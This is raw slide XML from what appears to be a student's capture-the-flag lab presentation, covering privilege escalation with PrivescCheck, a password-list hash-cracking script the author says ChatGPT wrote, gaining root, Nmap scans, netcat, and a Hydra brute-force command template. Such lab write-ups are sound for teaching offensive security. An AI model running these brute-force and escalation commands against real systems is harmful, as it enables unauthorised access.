              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>n -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>network interface information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 4" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E9E5EF-AFEA-224F-50E2-39C267784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769" y="2358592"/>
            <a:ext cx="6903720" cy="4183577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393806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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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EE0187-3F4A-86E1-73D9-9A151D50A7B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8D7487-32A1-BF71-41C2-008D84AFCB5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5000" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>PrivescCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>Windows)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5000"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1737880-C249-F72D-4E87-0BA5B937E549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Tool that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>dentifies and exploits vulnerabilities that allow an attacker to elevate their privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="__Inter_d65c78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="__Inter_d65c78"/>
              </a:rPr>
              <a:t>Python privesc-check.py –t –d –k –n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="__Inter_d65c78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>t -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>target specific user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>d -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>dump all user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>k -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kernal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>n -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>network interface information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EB5EFA-CE59-8996-575E-9733D726E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315" y="1921632"/>
            <a:ext cx="6065194" cy="4490344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230645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979244-9367-8000-AD03-366B5C8F2760}"/>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3E9704E4-0993-9E9A-F1CC-8C027F747A91}"/>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9ECD24E-027C-E19D-EE6E-3C04905323C8}"/>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2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A6D2A2-AAEF-1183-48C8-B5067105DA4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0F1EF-964D-EA2A-EB51-24C53C1FADEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340649" y="301752"/>
            <a:ext cx="6640721" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>privilege escalation by brute force</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456D20-AEAE-7350-33C7-B3EDCA299BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237554" y="2770160"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">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 I asked ChatGPT to make a simple script to make take a list of passwords then give it to the tool and the tool try to crack the hash with it and give a response back.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of a program code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F64532-304F-170B-2A0C-C4584E902CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5293996" y="2084832"/>
            <a:ext cx="6622332" cy="3890618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1903107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FB83F4-B2C5-ACEA-D261-C3F128234C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3DC96-CAB7-EAA4-0FFE-0C39A51F6FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0"/>
              <a:t>At The End</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98ABB1-DBE3-3FA1-1BAD-F255FBDF5FD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>After that I was able to get the credentials of the root user and sign in as root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen shot of yellow text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED98CEF-7AD3-55E5-E495-A1D4F7CF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34" y="640080"/>
            <a:ext cx="4284795" cy="5577840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377003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blue and white sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70754BE5-62C6-F12F-5A69-B441DC49FE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="2502"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="626590" y="317578"/>
            <a:ext cx="10851111" cy="3508437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 3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3" name="Straight Connector 3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DE85C0C2-6967-5853-3F95-A7E51AC22C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961869" y="938492"/>
            <a:ext cx="5881383" cy="2490508"/>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rPr>
              <a:t>3 Rooms Nmap: Live Host Discovery , Basic Port Scans , Post Port Scans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:ln w="22225">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70984F90-8B32-4CC4-A284-FDC6F160F2B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164734" y="4018143"/>
            <a:ext cx="9995451" cy="2129599"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ping Scans (ICMP):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&lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP Scans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-PR &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UDP Ping: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-PU53 &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service Version Details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;target&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17431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network diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8819DA-64B3-233E-887B-DEB6AC7EC287}"/>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20" y="-2109019"/>
            <a:ext cx="12191980" cy="8967019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B0712A-1EDC-3019-33FB-E544886F4228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545690" y="365126"/>
            <a:ext cx="10808110" cy="1286694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 Rooms : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Protocols and Servers and Protocols and Servers 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA432FC4-21AB-5805-89B2-C2E638EB6F12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545690" y="1651820"/>
            <a:ext cx="10808110" cy="4525143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common Protocols and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ports:like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> HTTP (port 80), HTTPS (port 443), FTP (port 21), SSH (port 22), SMTP (Simple Mail Transfer Protocol, port 25) ,SMB (Server Message Block, port 445</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool Telnet :Telnet can be used to manually connect to services on certain ports, interact with them (telnet &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  :for manual service interaction (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;port&gt; )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tool Hydra for Brute-forcing : hydra -l &lt;user&gt; -P &lt;password-list&gt; &lt;target-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;service&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C7289F-E3CA-C497-0A53-6C48BE04147F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="545689" y="5886539"/>
            <a:ext cx="8332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Port like SMTP: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> --script smtp-commands &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>&gt;</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4747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CD8762-B282-FA80-2790-C864704F01AF}"/>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4D6972E1-195B-ABB0-B87F-861F35A7D8F7}"/>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EC457E6-04F7-AFDC-15EE-9B391C64C35D}"/>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1AC7D-38F5-3E3C-CD23-BCD34DA66E5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3AAD9-C082-A650-522C-E395A8C43127}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="640080"/>
            <a:ext cx="4818888" cy="1481328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Information Gathering (Reconnaissance)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1"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8E4D07-9542-C568-3FE9-6C0478D2D880}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2660904"/>
            <a:ext cx="4818888" cy="3547872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
